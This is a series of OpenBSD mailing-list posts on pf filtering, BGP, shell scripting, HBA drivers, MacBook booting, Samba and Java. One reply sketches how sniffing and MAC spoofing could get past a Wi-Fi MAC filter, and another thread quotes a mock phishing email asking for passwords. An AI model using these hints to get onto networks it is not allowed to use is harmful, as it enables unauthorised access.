Jason Dixon wrote: On Wed, Mar 11, 2009 at 01:04:34PM -0400, David Goldsmith wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jason Dixon wrote: S/SAFR I just had to deal with this on our customer's PCI scan. Don't argue with the logic, just do it. :) Let me guess -- TrustKeeper? We just had to deal with this as well. Submit an appeal and they should accept it. Yup. The "flags S/SAFR" will work unless you are being a good little pf admin and also scrubbing all the traffic. The problem is pf considers SYN-RST packets to be illegal and drops them (good) but only considers SYN-FIN packets to be ambiguous and so it "normalizes" them and clears the FIN bit (in this case for the PCI scan - bad) Then your server behind the firewall received what it thinks is a nice clean SYN packet and it sends back SYN-ACK. Yes, we have our own reasons not to scrub there. Well, *someone* has their reasons. I have to deal with those reasons. ;) Ahhh my least favorite acronym name space conflict: PCI == Payment Card Industry Their "security through ignorance" practices are nearly as illustrious as their "business through abusive lending" practices. The thing to remember is the security facade they require is almost entirely for the sake of public confidence and litigation defense. --hmmm... I should probably save the rest of this rant for a far more appropriate mailing list, like /dev/null Anyhow, back to the original question, "are there any ramifications to blocking SYN+FIN completely?" Some (Darren Reed, ipf author) think that pf unconditionally clearing the FIN flag on scrub is a bug, And no, we don't need a flame war about whether or not Darren is "right," but none the less, it's still good to see how the RFC's and ideas about "correct" filtering are both subject to lots of interpretation. http://www.derkeiler.com/Mailing-Lists/FreeBSD-Security/2005-07/0011.html I know SYN+FIN is a valid packet according to RFC 793 and 1644 (T/ TCP), but the more important question is, "what are the valuable *uses* for SYN+FIN packets?" Personally, I can't think of any valuable uses. Can you? Just because SYN+FIN is a technically valid packet according to the various RFC's doesn't mean we want or need such traffic, and doesn't mean we consider it valuable and useful. Can you think of any RFC valid traffic you're dropping when the RFC's tell you that you're supposed to respond to it? --Ya, I thought so. Spammers? --Yep, RFC valid traffic. DDOS? --Yep, RFC valid traffic. Brute Force? --Yep, RFC valid traffic. port scans --A lot of it is RFC valid traffic. Though 'scrub' will drop the FIN flag off the SYN+FIN packets, the bofhish instinct says without a proven and valuable *use* for SYN+FIN, then just block it. If anyone complains about breakage, then just point your (middle) finger at PCI/TrustKeeper compliance requirements, and tell the user to take it up with them. Call me overly pragmatic, but if something in a standard is not providing valuable use (i.e. reward) and poses *any* type of risk or cost (including the risk and cost of wasting my time filing and maintaining some appeal), then the answer is painfully simple. -- J.C. Roberts
Re: feature request OpenBGPD: route server ability to disable best path selection
The 'standard' (for at least one vendor's definition of standard) way to get around this, is to slap a different route distinguisher (RD) on each of the desired 'duplicate' paths. BGP then sees these as individual paths and will happily communicate both concurrently. Separate but related, is the ability to import both RD's into the same VRF on the recipient of the BGP peering, and thus into the routing table (FIB) to use multiple paths (load balancing) etc. /Pete On 18 Mar 2009, at 11:32, Claudio Jeker wrote: On Wed, Mar 18, 2009 at 11:00:32AM +0100, Arnoud Vermeer wrote: I have a problem with filtering on the current route server implementation. I currently have the following setup: * 10.0.1.0/24 10.0.1.0/24 +---+ +---+ |AS1| |AS2| | 10.0.0.50 | | 10.0.0.51 | +---+ +---+ | | | | +---+---+---+ | RS| | 10.0.0.49 | +-+-+ | |deny to { 10.0.0.52 } AS 1 | +-+-+ |AS3| | 10.0.0.52 | +---+ (or http://www.freshway.biz/files/20090318-problem-filter.txt for the correct ASCII) Both AS1 and AS2 announce the same prefix, but the route server selects the AS1 path because of the lower nexthop value. Now I add a filter to AS3. I deny to send any prefixes to AS3 that match AS1. Now AS3 doesn't receive the 10.0.1.0/24 prefix at all. It should however receive it from AS2. Quagga overcomes this problem by making a per-filtered-peer RIB and then do best path selection (http://www.quagga.net/docs/docs-multi/Description-of-the-Route-Server-model.html ). I think this is just an ugly and complicated work-around as it doesn't solve the core of the problem. In my eyes the best solution will be to disable the best-path- selection on the route server altogether, and send all routes (except the filtered) to the peer. Arguments to do this: - As shown above, the best path selection breaks on the route server when applying filters. - A route server should not make any best-path selection, because the peers criteria could be completely different than the route server. - The function of the route server is to 'collect' all the routes and send them to all of the peers, not to 'collect a subset' of the routes and send that to its peers. I would love to hear your thoughts on this subject. Would it be hard to implement this feature? BGP only supports one path per prefix and peer. If you send multiple ones as you propose the later ones will overwrite the first one no matter what. To support your idea we would need a per-filtered-peer local-RIB because the route-server needs to do the best path selection for the peer. -- :wq Claudio
Re: European orders
A public statement from him (Wim) would be appropriate now I believe. Especially informing all of us who have pre-ordered the latest release via him what will happen with our orders, and importantly when he will forward the proceeds to Theo et al. /Pete On 25 Mar 2009, at 01:16, Floor Terra wrote: On Wed, Mar 25, 2009 at 12:34 AM, Theo de Raadt > wrote: Do you have any advice for those who allready ordered? Or should we contact the distributor? Sorry, but I don't know that yet. B We'll see, I suppose. Wim called me 20 minutes ago and explained the situation to me. If you have any questions just mail him or give him a call. -- Floor Terra www: http://brobding.mine.nu/
correction to gre(4) man page
SEE ALSO section, entry for Web Cache Coordination Protocol V1.0, link is broken. A suitable replacement is: http://www.ietf.org/proceedings/99jul/I-D/draft-ietf-wrec-web-pro-00.txt /Pete
Re: correction to gre(4) man page
On 12 Apr 2009, at 23:47, Jason McIntyre wrote: On Sun, Apr 12, 2009 at 10:40:08PM +0200, Pete Vickers wrote: SEE ALSO section, entry for Web Cache Coordination Protocol V1.0, link is broken. A suitable replacement is: http://www.ietf.org/proceedings/99jul/I-D/draft-ietf-wrec-web-pro-00.txt /Pete that link works fine here. jmc ahh, indeed. The culprit was the man->html conversion for this: http://www.openbsd.org/cgi-bin/man.cgi?query=gre where the URL is line wrapped, but the html does not take it into account. thanks for pointing it out. /Pete
Re: MPLS status questions.
On 30 Apr 2009, at 00:14, Daniel Ouellet wrote: Joe S wrote: What's really frustrating here are the network admins I work with that are trying to migrate from ipsec vpns to MPLS because it's "easier" and "just as secure". Well, I am not sure that it would be very convincing to them, but I guess a somewhat good argument to use might be as simple as asking them if they would replace IPSec tunnel/VPN on a big switch WAN/LAN network with only VLan tag instead? That's about what they say isn't it? Scary. May not be a very good example, but I think the analogy between them is somewhat valuable in idea and concept anyway. But again, the norm looks like these days is to only consider security after the fact and react to it instead of being proactive on it. See what they say. Best, Daniel you don't use telnet even over an IPSec WAN do you ? end-to-end security (e.g. TLS/SSL) is your friend here. It's the only way to actively verify link security and once you're in an SSH session (with properly verified keys), you don't care who's watching the stream /Pete
Re: IMPORTANT, DO THIS OR YOUR E-MAIL WON'T WORK
On 27 May 2009, at 10:01, Otto Moerbeek wrote: On Wed, May 27, 2009 at 09:43:18AM +0200, Otto Moerbeek wrote: On Wed, May 27, 2009 at 10:29:10AM +0300, Gregory Edigarov wrote: Bob Beck wrote: * Chris Harries [2009-05-26 10:48]: it sure beats everyone moaning at me as they cannot read e-mails clearly marked IMPORTANT, DO THIS OR YOUR E-MAIL WONT WORK, then moaning when their email doesn't work IMPORTANT, DO THIS OR YOUR E-MAIL WON'T WORK We are refreshing our openbsd mailing lists to ensure that the list memberships correctly match our business process and security roles. In order to ensure your list memberships and email continue to work without interruption, please reply to this email with the following information: Name : ___ Email ID: Password: Thanks for helping to ensure the integrity of our email system. Pardon? I do not understand what is this for explanation will follow once you provide the neccesary provide of ehhh s/provide/proof authentication. -Otto I seriously thought you'd done the typo deliberately to mimic the poor english typically found in such fraud emails. LoL. /Pete
Re: BGP and NATting to multiple ISPs
On 18. juni. 2009, at 19.45, Karl O. Pinc wrote: What's the best way to solve this problem? stop trying to bodge it, and get some PI space. /Pete
Re: BGP and NATting to multiple ISPs
nah, you maybe right technically with the data-center argument, but not politically. Everyone has the 'right' to proper redundancy for H/A if they want/need it. Actually, the sooner the IPv4 space gets used up the better, then everyone will have to migrate to IPvShit, and be done with it. /Pete On 18. juni. 2009, at 22.49, tico wrote: Karl O. Pinc wrote: On 06/18/2009 01:50:17 PM, Pete Vickers wrote: On 18. juni. 2009, at 19.45, Karl O. Pinc wrote: What's the best way to solve this problem? stop trying to bodge it, and get some PI space. I'd love but, how can I justify to ARIN a large enough address block that it won't be dropped by BGP administrators? The only reason we'd need the addresses is to muti-home. ARIN says you can get a /22 for multihoming if you can justify their 25% / 50% usage as spelled out in their numbering policy. https://www.arin.net/policy/nrpm.html#four322 If you can't justify that, then get a /24 of PA space from a provider that *will* allow you to reannounce that /24 via an additional transit and *will* provide you with an LOA that you can provide to that additional transit operator. The number of networks that filter prefixes smaller than /22 don't appear to be that numerous IMHO, but if they do, your /24 will still be reachable as they'll see the larger /19 or whatever from your provider that it's carved out of. I am under the impression this is not reason enough for ARIN, that they are in a rationing mood when it comes to handing out IPv4 address blocks. As well they should be. IP resources are scarce and people are wasteful and greedy. Most offices don't need BGP multihoming, or any sort of inbound multihoming at all-- just outbound which is easily done without the assistance of the ISPs themselves or ARIN by using NAT and upstream- failover features commonly found in most routers. Most world-accessible servers that are important enough to need inbound multihoming should be sitting in a datacenter which has significantly more professionally-managed multihoming than small offices. And before the flaming starts, remember that I said "most." Cheers, Tico Karl Free Software: "You don't pay back, you pay forward." -- Robert A. Heinlein
Re: BGP and NATting to multiple ISPs
On 19. juni. 2009, at 00.10, Henning Brauer wrote: * Pete Vickers [2009-06-19 00:02]: Actually, the sooner the IPv4 space gets used up the better, then everyone will have to migrate to IPvShit, and be done with it. that doesn't solve a single problem. in return, you get a plethora of new ones on top. -- Henning Brauer, h...@bsws.de, henn...@openbsd.org BS Web Services, http://bsws.de Full-Service ISP - Secure Hosting, Mail and DNS Services Dedicated Servers, Rootservers, Application Hosting - Hamburg & Amsterdam Once 'everyone' is solely 'on' v6, then v4 space not a concern. As lots of folks (and I'm one of them) here point out v6 has many many issues, but premature v4 exhaustion / v6 migration, would force these issues to be resolved a lot quicker. /Pete
Re: BGP and NATting to multiple ISPs
On 19. juni. 2009, at 00.40, Ted Unangst wrote: On Thu, Jun 18, 2009 at 5:54 PM, Pete Vickers wrote: nah, you maybe right technically with the data-center argument, but not politically. Everyone has the 'right' to proper redundancy for H/A if they want/need it. Actually, the sooner the IPv4 space gets used up the better, then everyone will have to migrate to IPvShit, and be done with it. oh really? people are going to start carrying /48s in a world where they don't even carry anything more than a /24 for ipv4? admins who filter >= /24 and don't set a default to upsteam [1], generally get what they deserve - since they are blackholing potential customers. If their employer is so cash strapped they can't afford the ASIC space for a full table, then presumably their market share & b/w usage are such that they can hold the table in software instead. (dumb north american routing policies excepted) [1] Or 0.0.0.0/1 and 128.0.0.0/1 across links, or somesuch. /Pete
sole instance of a process
Hi, I suspect this may be the wrong list for this question. However although strictly it's a Bourne shell script query, it only seem to act up under OpenBSD (for me). Essentially I have a job which needs to be run periodically. So I have a shell script to do the necessary commands, and this is scheduled via (root's) crontab. It is however very important that multiple instances of the job are not run concurrently (e.g. if an previous invocation hung), and so the script should detect this upon invocation before proceeding. I don't want a single long running job (which could e.g. sleep between loops) for various reasons. And I also don't like PID files and other fragile locking hacks. So down to business, below is the gist of my script. Most of the time it appears to run fine. However occasionally (once every couple of days?) it reports via email that a duplicate process is detected, but the included ps listing shows no other instance. I don't believe that this is just due to an old instance exiting in the small time window between the pgrep, and the ps invocations. So basically I guess there is an error in my script or it's logic, or something else I'm not seeing. Any hit with the clue bat gratefully received. #!/bin/sh # # SHOUT="/usr/bin/logger -i -t MYPERIODICJOB" # # # Ensure another instance of this is not running # MYNAME=`basename $0` MYPID=$$ # /usr/bin/pgrep -fu root $MYNAME | /usr/bin/grep -v $MYPID && \ { $SHOUT "HELP - duplicate process detected $?" ; \ ps -axjwww | mail -s "HELP MYPERIODICJOB $MYPID $MYNAME $PPID" m...@example.com ; \ exit 1 ; } # # # starting doing useful stuff here.. # Disclaimer: I know my scripting is far from optimal... /Pete
'newer' Qlogic HBA support on amd64
Hi, I have a an amd64 server (HP DL360 G5), with an Qlogic FC HBA in it. It appears to be based on the ISP2400 series, and isp man page says the driver only supports up to the ISP2300 series. However the driver appears to try to attach the device irrespective (and fail). Does anyone know how different the 2400 series are, or if there is work in progress to support them ? thanks /Pete Some relevant info below: $ dmesg | grep isp0 isp0 at pci8 dev 0 function 0 "QLogic ISP2432" rev 0x02: apic 8 int 17 isp0: Polled Mailbox Command (0x8) Timeout (10us) isp0: Polled Mailbox Command (0x8) Timeout (10us) isp0: Mailbox Command 'ABOUT FIRMWARE' failed (TIMEOUT) # pcidump -v 19:0:0 19:0:0: QLogic ISP2432 0x: Vendor ID: 1077 Product ID: 2432 0x0004: Command: 0147 Status ID: 0010 0x0008: Class: 0c Subclass: 04 Interface: 00 Revision: 02 0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 10 0x0010: BAR io addr: 0x5000/0x0100 0x0014: BAR mem 64bit addr: 0xfdff/0x4000 0x001c: BAR empty () 0x0020: BAR empty () 0x0024: BAR empty () 0x0028: Cardbus CIS: 0x002c: Subsystem Vendor ID: 103c Product ID: 7040 0x0030: Expansion ROM Base Address: 0x0038: 0x003c: Interrupt Pin: 01 Line: 07 Min Gnt: 00 Max Lat: 00 0x0044: Capability 0x01: Power Management 0x004c: Capability 0x10: PCI Express Link Speed: 2.5 / 2.5 GT/s Link Width: x4 / x4 0x0064: Capability 0x05: Message Signaled Interrupts (MSI) 0x0074: Capability 0x03: Vital Product Data (VPD) 0x007c: Capability 0x11: Extended Message Signaled Interrupts (MSI-X) $ dmesg | head OpenBSD 5.3 (GENERIC.MP) #62: Tue Mar 12 18:21:20 MDT 2013 dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP # sysctl hw hw.machine=amd64 hw.model=Intel(R) Xeon(R) CPU E5420 @ 2.50GHz hw.ncpu=4 hw.byteorder=1234 hw.pagesize=4096 hw.disknames=sd0:20008a7ae6c37c52,cd0: hw.diskcount=2 hw.sensors.cpu0.temp0=37.00 degC hw.sensors.cpu1.temp0=37.00 degC hw.sensors.cpu2.temp0=37.00 degC hw.sensors.cpu3.temp0=37.00 degC hw.sensors.acpitz0.temp0=8.30 degC (zone temperature) hw.sensors.ciss0.drive0=online (sd0), OK hw.cpuspeed=2500 hw.setperf=100 hw.vendor=HP hw.product=ProLiant DL360 G5 hw.physmem=4292161536 hw.usermem=4292136960 hw.ncpufound=4 hw.allowpowerdown=1
Re: 'newer' Qlogic HBA support on amd64
Hi, Sorry for the delay. I finally upgraded the box (very quick and easy process - nice ) and the HBA is now attached by the qle driver. However whilst it 'sees' the SAN disk behind it, it remain unable to talk to it. # uname -mrv 5.5 GENERIC.MP#315 amd64 # dmesg | egrep -i "qle|scsibus1" qle0 at pci8 dev 0 function 0 "QLogic ISP2432" rev 0x02: msi qle0: bad startup mboxes: 0 0 qle0: firmware rev 4.0.20, attrs 0x2 scsibus1 at qle0: 2048 targets, WWPN 50060b66644e, WWNN 50060b66644f sd1 at scsibus1 targ 130 lun 0: SCSI2 0/direct fixed naa.600601601b662700d837603da8efe011 sd2 at scsibus1 targ 131 lun 0: SCSI2 0/direct fixed naa.600601601b662700d837603da8efe011 sd1 & sd2 : Are these duplicates due to redundant paths in SAN fabric ? # fdisk sd1 fdisk: DIOCGPDINFO: Input/output error fdisk: Can't get disk geometry, please use [-chs] to specify. # pcidump -v 19:0:0 19:0:0: QLogic ISP2432 0x: Vendor ID: 1077 Product ID: 2432 0x0004: Command: 0147 Status: 0010 0x0008: Class: 0c Subclass: 04 Interface: 00 Revision: 02 0x000c: BIST: 00 Header Type: 00 Latency Timer: 00 Cache Line Size: 10 0x0010: BAR io addr: 0x5000/0x0100 0x0014: BAR mem 64bit addr: 0xfdff/0x4000 0x001c: BAR empty () 0x0020: BAR empty () 0x0024: BAR empty () 0x0028: Cardbus CIS: 0x002c: Subsystem Vendor ID: 103c Product ID: 7040 0x0030: Expansion ROM Base Address: 0x0038: 0x003c: Interrupt Pin: 01 Line: 07 Min Gnt: 00 Max Lat: 00 0x0044: Capability 0x01: Power Management 0x004c: Capability 0x10: PCI Express Link Speed: 2.5 / 2.5 GT/s Link Width: x4 / x4 0x0064: Capability 0x05: Message Signaled Interrupts (MSI) 0x0074: Capability 0x03: Vital Product Data (VPD) 0x007c: Capability 0x11: Extended Message Signaled Interrupts (MSI-X) e.g. http://filedownloads.qlogic.com/files/datasheets/32359/83432-580-00D.pdf (let me know if you want list spam with full dmesg). /Pete On 13. mars 2014, at 18:48, Ted Unangst wrote: > On Thu, Mar 13, 2014 at 18:44, Pete Vickers wrote: >> Hi, >> I have a an amd64 server (HP DL360 G5), with an Qlogic FC HBA in it. It >> appears to be based on the ISP2400 series, and isp man page says the >> driver only supports up to the ISP2300 series. However the driver appears >> to try to attach the device irrespective (and fail). Does anyone know how >> different the 2400 series are, or if there is work in progress to support >> them ? > > In 5.5 and later, that's supported by the qle driver. The isp driver > is being broken into parts (qlw, qla, qle) depending on generation. > I'd try a snapshot. It should work better. And if it doesn't work, > we'd like to know.
External monitor issue with EFI & MacBook
Hello all, I'm having issues installing OpenBSD 6.0 (-current) on my old Apple MacBook (Early 2008). The builtin screen is broken so I'm using a mini-DVI to VGA connector and external monitor to do the install. I'm under the impression that it's better to install / boot from EFI instead of the BIOS mode because the computer won't display the SATA controller in BIOS mode but will in EFI mode. I don't know if this is actually true or not but I remember something on undeadly.org about a dev's experience with a MacBook Air with a similar story. Anyways, so I do the install as a BIOS boot and it works just fine. I did the GPT route and rebooted. Now if the laptop lid is open it boots just fine (but I need to boot the Mac with it closed so the external video starts) but if the lid is closed it will boot until this line: efifb at mainbus0 not configured and then the screen goes blank. I believe it's a hang too, I setup networking and was unable to ping it after it should have booted up. With the screen open however, it boots up just fine. I've included a full dmesg from a sucessful boot below. I've tried enabling verbose mode in boot -c but it seems the graphics drivers don't initialize until after that (I just get a blank screen). With config -e I've tried to turn off a few features (efifb, uvideo, etc.) with no luck. My feeling is the graphics drivers don't see the attatched external screen or there is a failure handing off between the EFI and the kernel but I'm not really sure. Can someone try to receate this issue? (Boot up an amd64 Mac with lid closed in EFI mode) Also, does anyone have a guess as to where the code might be that controls this? I want to take a look before I file a formal bug report. Thanks, Pete Zabagel OpenBSD 6.0-current (GENERIC.MP) #2480: Wed Sep 21 11:18:24 MDT 2016 dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP real mem = 2107633664 (2009MB) avail mem = 2039320576 (1944MB) mpath0 at root scsibus0 at mpath0: 256 targets mainbus0 at root bios0 at mainbus0: SMBIOS rev. 2.4 @ 0x7eec3000 (41 entries) bios0: vendor Apple Inc. version "MB41.88Z.00C1.B00.0802091535" date 02/09/08 bios0: Apple Inc. MacBook4,1 acpi0 at bios0: rev 2 acpi0: sleep states S0 S3 S4 S5 acpi0: tables DSDT FACP HPET APIC MCFG ASF! SBST ECDT SSDT SSDT SSDT SSDT acpi0: wakeup devices ADP1(S3) LID0(S3) ARPT(S3) GIGE(S3) UHC1(S3) UHC2(S3) UHC3(S3) UHC4(S3) UHC5(S3) EHC1(S3) EHC2(S3) EC__(S3) acpitimer0 at acpi0: 3579545 Hz, 24 bits acpihpet0 at acpi0: 14318179 Hz acpimadt0 at acpi0 addr 0xfee0: PC-AT compat cpu0 at mainbus0: apid 0 (boot processor) cpu0: Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1197.21 MHz cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CV,PAT,PSE36,CFLUSH, DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,DTES64,MWAIT,DS-CPL,VMX,EST,TM2, SSSE3,CX16,xTPR,PDCM,SSE4.1,NXE,LONG,LAHF,PERF,SENSOR cpu0: 3MB 64b/line 8-way L2 cache cpu0: smt 0, core 0, package 0 mtrr: Pentium Pro MTRR support, 8 var ranges, 88 fixed ranges cpu0: apic clock running at 199MHz cpu0: mwait min=64, max=64, C-substates=0.2.2.2.2.1.3, IBE cpu1 at mainbus0: apid 1 (application processor) cpu1: Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1197.00 MHz cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUS H,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,DTES64,MWAIT,DS-CPL,VMX,EST,TM 2,SSSE3,CX16,xTPR,PDCM,SSE4.1,NXE,LONG,LAHF,PERF,SENSOR cpu1: 3MB 64b/line 8-way L2 cache cpu1: smt 0, core 1, package 0 ioapic0 at mainbus0: apid 1 pa 0xfec0, version 20, 24 pins acpimcfg0 at acpi0 addr 0xf000, bus 0-255 acpiec0 at acpi0 acpiprt0 at acpi0: bus 0 (PCI0) acpiprt1 at acpi0: bus 2 (RP05) acpiprt2 at acpi0: bus 3 (RP06) acpiprt3 at acpi0: bus 4 (PCIB) acpicpu0 at acpi0: !C3(100@57 mwait.3@0x31), !C2(500@1 mwait@0x10), C1(1000@1 mwait), PSS acpicpu1 at acpi0: !C3(100@57 mwait.3@0x31), !C2(500@1 mwait@0x10), C1(1000@1 mwait), PSS acpiac0 at acpi0: AC unit online acpibtn0 at acpi0: LID0 "APP0002" at acpi0 not configured acpibtn1 at acpi0: PWRB acpibtn2 at acpi0: SLPB "APP0001" at acpi0 not configured "APP0003" at acpi0 not configured "ACPI0002" at acpi0 not configured acpibat0 at acpi0: BAT0 not present acpivideo0 at acpi0: GFX0 cpu0: Enhanced SpeedStep 1197 MHz: speeds: 2400, 2200, 2000, 1800, 1600, 1400, 1200, 800 MHz pci0 at mainbus0 bus 0 pchb0 at pci0 dev 0 function 0 "Intel GM965 Host" rev 0x03 inteldrm0 at pci0 dev 2 function 0 "Intel GM965 Video" rev 0x03 drm0 at inteldrm0 intagp0 at inteldrm0 agp0 at intagp0: aperture at 0x8000, size 0x1000 inteldrm0: msi inteldrm0: 1280x800 wsdisplay0 at inteldrm0 mux 1: console (std, vt100 emulation) wsdisplay0: screen 1-5 added (std, vt100 emulation) "Intel GM965 Video" rev 0x03 at pci0 dev 2 function 1 not configured uhci0 at pci0 dev 26 function 0
non-PAP in radiusd
Hello friends, I noticed in the radiusd.conf man page that the bsdauth module only supports PAP: "It only supports PAP, password based authentication." Is there a specific reason as to why CHAP isn't implemented? I am assuming it is due to time / interest constraints but perhaps the quality of CHAP is in question too -- I see in the RFC that MD5 is assigned a specific value, making me wonder if MD5 is the predominant algorithm of CHAP implementations in the wild and perhaps considered insecure by the community. On a side note, does anyone know which algorithms are used in CHAP besides MD5? Thanks, Pete
Re: OpenBSD 6.1 Release
Since 6.1 will be the first release in our "twentieth year" I hope the foundation offers installation service where Theo shows up in a limousine wearing a tuxedo and installs 6.1 for the princely sum of $10,000. What do you say Theo? -PZ From: owner-m...@openbsd.org on behalf of tec...@protonmail.com Sent: March 1, 2017 12:07:45 PM To: Theo de Raadt; misc@openbsd.org Subject: Re: OpenBSD 6.1 Release I was counting from last release on Sept 1st, my apologies. > Wondering if anyone knows about the new release schedule? It has > always been 6 months of course, so I presumed today would be the > day. Probably just a little impatient and excited for this one. Releases are generally near start of May and November.
Re: OpenBSD 6.1 Release
Oh, and he needs to port it to my TAM* and stay for fancy hors d'oeuvres (beef jerky, pop tarts and whiskey). *http://guides.macrumors.com/Twentieth_Anniversary_Macintosh
Re: is it possible to speed up network to 1 Gb ?
> The more complex the protocol, the slower the transfer. > 85 MB/sec sounds about right for ftp in my opinion, samba may need some > performance tuning. Yep, I would recommend when tuning Samba to not just throw a bunch of optimizations in there and expect it to work magically. It's better to test with just a few (or even 1) modification first and work from there. OpenBSD can be a little slower but the trade off for better security is worth it IMHO. If you going between Linux and OpenBSD NFS would also be an option (not without it's own tuning difficulties at times). Remember you can tune Samba but you can't tune-a-fish! -PZ
Re: Why isn't OpenBSD in Google Summer of Code 2017?...
Would the devs consider compiling a list of specific improvements they'd like to see volunteer'd upon this summer? I'd love to help especially if it was a group effort/friendly competition. From: owner-m...@openbsd.org on behalf of Bob Beck Sent: April 2, 2017 10:16:21 PM To: Luke Small Cc: openbsd-misc Subject: Re: Why isn't OpenBSD in Google Summer of Code 2017?... We tried it for two years, it was too much effort on the part of the foundation organizers mentors to deal with the bureaucracy involved, and we didn't really see enough return in terms of new developers to the project, which, frankly being selfish on OpenBSD's part is the only reason for us to do it. Both Ken Westerback and I organized our end of it and dealt with the google paperwork the two years we did it, Neither of us is willing to do it again, and while I won't directly speak for Ken, I would not support us spending effort on this when there are lots of other things to do.. It just doesn't have the benefit for OpenBSD, especially in light of the effort of the volunteers necessary to participate. On Sun, Apr 2, 2017 at 8:54 AM, Luke Small wrote:
Re: Replace sendmail with qmail?
In case it's needed (which I doubt), I'll voice my VERY strongly preference for sendmail instead of all these other pretenders. /Pete On 30 Nov 2007, at 10:25 AM, Matthew Dempsky wrote: On 11/30/07, Peter Hessler <[EMAIL PROTECTED]> wrote: That being said, its really easy to install qmail yourself and have it replace the in-tree sendmail (see mailer.conf). Right, and maybe for a future OpenBSD release you could swap the placement of sendmail and qmail in that sentence. :-) To be clear, I suggested replacing sendmail with qmail because 1) it would further OpenBSD's efforts of eliminating unacceptably licensed code and 2) I'm familiar with qmail, so I can actually contribute patches. If there's a more suitable MTA, I'd be even happier to see it go in (as long as I can keep using qmail ;-).
Re: Embedding OpenBSD
step 1. get a any old ipod on ebay step 2. put a single mp3 tune on it step 3. place it in a big box, with the play button located right under a coin sized slot openbsd is great, but it's not the hammer for all nails... /Pete On 28 Dec 2007, at 3:34 AM, Nick Holland wrote: > I've got a little project I'm working on here. > It involves stuffing a computer in a donation box with a > money detector, so every time someone tosses money in the box, > it plays an MP3 file. > > (no, you can't make a living at this. At least, *I* can't) > > The first two of these I did were many years ago, and we used a > 486 running a simple DOS app. Well, computers that run DOS well > are gone, and trying to bring up a new program to play sound > files on any of the modern sound chips would be (not) fun...and > annoying the next time the hardware all changes again. > > So, for this generation, I'm using OpenBSD, mpg321, and a 1G > CF flash device attached to an CF-> IDE interface. > > However, this is the first time I've ever done an OpenBSD system > that wasn't going to be attached to some kind of network for > (hopefully) years at a time. In fact, hopefully, it will NEVER > be attached to a network. And, while I got a 1G CF device, I > could imagine doing something stupid and having it slowly fill > the CF media and six months from now getting a call saying, "It > died. Come fix it", and since it will be in another country and > probably a ten hour drive away, I'd like to avoid that. :) > Once this thing is deployed, I won't have access to it at all, > so I'll have no ability to spot a potential problem or fix it. > > SO, to try to keep things quiet, I've disabled the daily, weekly, > and monthly scripts, I've disabled sendmail in /etc/rc.conf.local. > Before I ship it out, I'll move /var/log and /var/tmp to point to > a mfs system, so hopefully, if something starts logging, a power > cycle will dump everything. Only 60M is mounted RW, so it fsck's > very quickly, and my app writes only to the MFS. > > What have I forgotten? Is there anything else I can do to avoid > slapping my forehead and saying, "D'oh! Forgot to ..." before I > ship it out fully detached? The good news is I'm pretty sure > there is at least one OpenBSD developer near-by, but that's just > all the more reason to make sure I don't screw it up, I'll never > live it down. :) > > Nick.
Re: avoiding a mac address filter
Well this sounds very much to me like 'We know (for example) Windows security is weak by design, but it's not MS's fault for a crap system, it's the bad guys fault for actually realising it'. I disagree, MS have no excuse for not providing sufficient/suitable security in their products, and may even have a legal obligation to do so. Also, whilst I would never condone hacking (cracking), but I believe in freedom of information, and even a potential security expert must begin his/her learning somewhere. It is common knowledge, and freely available on the Internet (http://www.openbsd.org/cgi-bin/man.cgi) that tcpdump may allow you to watch network traffic on a shared medium such as WLAN, and also that ifconfig may allow you to change the MAC address on your network card. Note that if your country interprets freedom in such a fashion that it would implicate me here, then this email is intended to improve the ability of a 'good guy' not encourage a 'bad guy'... To put it another way, is it my fault for teaching you to drive a car, if you then use those skills to run down innocent pedestrians ? /Pete On 7 Jan 2008, at 8:28 PM, Andreas Maus wrote: On Mon, Jan 07, 2008 at 12:19:26PM -0500, Dave Anderson wrote: On Mon, 7 Jan 2008, Pau Amaro-Seoane wrote: loosen up a bit, you're too tight up... I just want to check my emails, I don't want to download p0nr movies Theft of service is theft, regardless of how much or little service you're stealing. If someone's gone to the trouble of filtering on MAC addresses, they've clearly indicated that they're not a public service -- and no amount of weasel-wording will get around that. ACK! Furthermore, depending on your origin this is considered a criminal act if you circumvent the MAC filter. E.g. here in germany you will pay for that crime or go to jail (for up to 5 years) doing this for a: sniffing the traffic to get a valid IP/MAC association b: breaking into the system which is protected (even a MAC filter is considered a protection). And NO A SYSTEM THAT USES MAC FILTERING IS NOT AN OPEN ACCESSPOINT! Oh and by the way it may be considered a crime trying to do or giving you tips how to do this (incitement). If you have a similar system at work and you will try to figure out how bad guys may attack this ... well talk to your boss or your IT security team. Maybe you will be assigned to a penetration test. But in this case you have to sign an agreement what you should do, what you shouldn't do and when and how to to such tests. (and if you are in a position to do penetration test you wouldn't ask such questions ;) ) So don't expect any answer on this list. Andreas. -- Windows 95: A 32-bit patch for a 16-bit GUI shell running on top of an 8-bit operating system written for a 4-bit processor by a 2-bit company who cannot stand 1 bit of competition.
Re: BSD Port from OpenJDK
Hi, Whilst I fully acknowledge the stigmatism that goes with java, I'm very grateful to Kurt et. al. for making it run under OpenBSD. It has saved me from having to admin extra linux/solaris boxes many times, when customers insist on java. I'm also looking forward to merely pkg_add'ing it instead of the playing "hunt the patch after license clicking" that was previously necessary. Nice work ! Appreciated. /Pete On 15 Oct 2008, at 02:06, Kurt Miller wrote: On Tuesday 14 October 2008 11:13:41 am new_guy wrote: Ben Adams-3 wrote: Just wondering if this will effect OpenBSD with java: Per the interim governance guidelines for Projects [1] I'm pleased to announce the creation of the BSD Port Project Java is nasty. There... I said it and it is true. The goopy OOP of Java will tarnish anything it touches. Personally, I hope Java (in all of its virtual glory) never makes it into OpenBSD at all. Real men will cry man tears when OpenBSD ships with Java. Uninformed. We've had Java for years and now we have packages: ftp://ftp.openbsd.org/pub/OpenBSD/snapshots/packages/i386/jdk-1.7.0.00b24p2.tgz 4.4 will have packages 